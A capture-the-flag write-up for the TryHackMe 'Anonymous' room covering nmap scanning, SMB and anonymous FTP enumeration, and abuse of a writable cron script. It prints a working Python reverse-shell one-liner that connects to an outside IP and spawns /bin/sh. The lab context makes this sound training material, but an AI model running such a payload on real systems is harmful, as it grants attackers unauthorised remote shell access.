Anonymous Tryhackme Writeup

3 min readJan 24, 2021

Anonymous link:https://tryhackme.com/room/anonymous

Let’s start with nmap scan as usual.

Command: nmap -A -T4 -p- IP

here -A means aggressive scan (scans everything like host name , version detection, os and all but it is a bit loud but as we are doing this for practice and on tryhackme , we shouldn’t focus on that).

T4 is the speed ( you can set any T1,T2,T3,T4,T5 .T1 is the slowest and T5 is the fastest)
-p- means scanning all 65535 ports.

The map result shows that 4 ports are open.

When I saw smb i thought maybe it is also like legacy box of Hackthebox and we may found a metasploit module for it .But I was wrong , couldn’t find a single exploit for this version of samba

Now I thought let’s see the shares of smb .

Command smbclient -L \\\\IP\\

and there was a share (pics) there.So I thought let’s see that.

It had 2 pictures ,so I thought let’s download that and see what it has(steganography i thought) .But it was also nothing as there were 2 images of dogs and nothing else.

Now, I realized that ftp anonymous login is enabled.

Let’s ftp to the machine

Command : ftp IP

It had a folder called scripts and inside that there where 3 files and I downloaded all of them.

to_do.txt

2.removed_files.log

3. clean.sh

It looks like a cron job that runs andprints “Running cleanup script: nothing to delete” and appends it to removed_files.log .

Now we can edit this and make it into a reverse shell and upload it on ftp .

Reverse shell:python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.0.0.1”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

Remember to change ur IP and port on which you listen on ur machine.